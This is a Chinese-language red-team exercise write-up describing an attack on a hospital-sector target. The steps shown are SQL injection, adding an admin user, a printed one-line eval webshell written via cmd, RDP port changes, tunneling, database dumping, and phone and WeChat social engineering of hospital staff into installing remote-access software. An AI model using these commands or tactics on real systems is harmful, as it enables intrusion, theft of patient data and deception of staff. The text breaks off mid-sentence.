前言

部分图片打码严重，怕漏点儿，部分截图为工具缓存截图。近期又结束了一个HVV，有点儿心力憔悴，最后成绩还行吧，起码在周期内还当了几天的"榜一大哥"。这次记录的是其中一个很有意思的靶标，靶标是YL行业的。

对于YL行业的靶标开展攻击思路大致分为三个步骤：

• 互联网网站控制服务器然后横向
• 钓鱼进入内网，但是需要突破隔离网，因为控制的终端并不一定是处于业务内网以及核心网
• 近源攻击，但是本次的规则中明确提出禁止近源。

入口1

前期的信息搜集的话不介绍了，靶标单位的公众号以及小程序等的接口基本上都测试过了，确实没发现问题。如果说真的有洞的话只能说我们比较菜，确实没找到突破口。但是在子域名解析下ip地址的c段找到了一个.net语言开发的网站，功能比较简单，甚至没有后台（在控制之后发现是站库分离，后端在内网的另外一台机子上）。看到的第一点都感觉有注入，简单手工注入测试就找到了注入点。

查看ip地址为私网172段，切当前用户为system权限。

查询网络连接状态：

了解到当前内网的网段有18和16段。查询当前进程并没有发现任何杀软，执行命令添加用户并且加入管理员用户组：

第一个没想到

死活上线不了，我一直以为是不是杀软的原因，powershell啥的乱七八糟的上线方式都尝试一遍了。一般除了ZW的站来说，互联网映射的一般都可以出网，甚至DMZ区的机器都能出网，本来以为会很顺利，这台机器竟然不出网，这是让我没想到的，ping了dns直接不通，这次真的草率了！

咨询了一堆朋友，尝试了乱七八糟的各种姿势，我竟然一开始就固定思维默认这台机子出网了，真想赏自己俩面条，因为上线问题搞了俩钟头。

因为不出网，所以下一步的操作根本无法执行：

• 工具无法上传
• 内网无法横向，甚至windows的机器也无法密码喷洒

于是想起了第二种方式来继续利用这个shell，写webshell端口转发+RDP。到这里心态又恢复了。

第二个没想到

本来以为写webshell这么简单，我的权限还是system权限，写shell那不是给我送机器么。令我没想到的是执行命令只要涉及到中文路径，统统报错，What？涉及中文路径就报错。真的裂开了。

不过没关系，这时候经常写webshell的老哥肯定想到，完全可以查询web路径然后写入webshell。顶多也就是时间问题了，没关系，因为我觉得这个系统必定跟HIS等的系统有关联，瞬间心里信心又回来了。

命令惠存：

for /r C:\ %i in (xxx.aspx) do echo %i> %i..\path1.txt

费劲扒拉的跑了半小时，找到了路径：

访问web界面的txt：

突然感觉又行了。ahhh，接下来就是写webshell，浅浅测试一下txt，发现txt完全没问题。写简单的一句话：

cmd /c "d: & echo ^<%eval request(\"chopper\")%^> > \a.aspx"

当然这个命令完全没问题，注意windos的注入是需要防止转义的。又经过了费劲巴拉写进去了。发现a.aspx也写进去了，访问回显代码401：

裂开了，白忙活一场，webshell写入了，回显401。前期写shell回显404：

试错的成本太高了，告别了写不进入的404迎来了401。

入口2

前面的方法耗时耗精力，脑补了太多的结发，webshell死活也写不进去。开始脑补社工行不行，开始sql注入进行dump数据。

进行爆库，爆表，爆字段：

这里可能有同志觉得web业务有了，其实不然，字段内的密码全为加盐的md5，没一个能解的：

有通用密码，但是确实猜不到。但是里面的字段有手机号，然后结合公众号的互联网医院查询了挂号医生，确认了数据是没有问题的。那么尝试钓鱼试试了。

第三个没想到

本来就是不抱希望的进行钓鱼，因为一般微信直接添加好友询问内容可信度是不高的，但结果出乎我的意料，直接添加成功，询问的自然点儿是没有问题的。

但是比较裂开的是，马子死活不上线：

我测试了确实也是免杀的，究竟是什么奇葩原因。我再忐忑究竟是不是因为我VPS被情报社区打标签了。于是开始直接开启不要脸模式，社工老师直接开的向日葵便携版：

向日葵，真香呀！！！！

第四个没想到

上来直接退出某数字杀软，上线了CS改版的原生马子，没有问题，解释不了免杀马为什么双击上线不了，都是64位操作机，玄学问题。solo一波机器的浏览器记录以及存贮的账号密码后面备着用，但是没有YL的核心系统，毕竟HIS登录需要Ukey没办法，但是服务器的段是没有问题的，互联网出口的那台机器必定处于核心网。NPS隧道打起来，端口转发3389，因为直接连接出口服务器的内网的3389同样无法连接。

端口转发出口的那台机子的3389是成功的，因为同时转发了web业务端口，测试是没有问题的，并且再xp_cmdshell下开启RDP，但是3389无法转发成功，白添加用户了。真是白瞎了添加的用户。本来我在想是不是端口的问题，使用命令更换RDP端口：

reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3388 /f

重启RDP服务：

net start TermService

依旧无法转发成功。只有一种可能性网闸的原因。

利用社工机钓鱼

无法利用就直接用社工机器横向，内网禁ping，solo工具Fscan扫描也只能使用参数-np，比较慢，扫描内网发现有其它业务服务器，其中发现另一个服务器有业务同样有注入。同样的方式如法炮制，我感觉又行了，没想到这台机子同样无法出网。机器的环境类似，无杀软但是又system权限。

就打了几台打印机，获取了部分数据无了。这个时候感觉没戏了。

入口3

还是不想死心，上面三台机器可能同时一个科室的，尝试能不能社工一台其它科室的机器，还是利用上面dump出的手机号，社工另外一名老师：

okkk，直接开开搞，只要接电话接的够自信，别人永远不会质疑你，比较幸运的是这个老师有事情给我推了另外一个老师，有中间人介绍这种情况下的信任是最牢固的。

某主任的电脑出网是跟上面的老师聊天出网的。

第五个没想到（转折）

主任的终端果然是双网卡，太香了！！！！

主任的机器上有inode，连接上Inode后走的锐捷的代理，这时候出口服务器的RDP可以连了，内网获取多台服务器和数据库，服务器分可能不够，但是核心服务器和数据库拿下了。

![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/G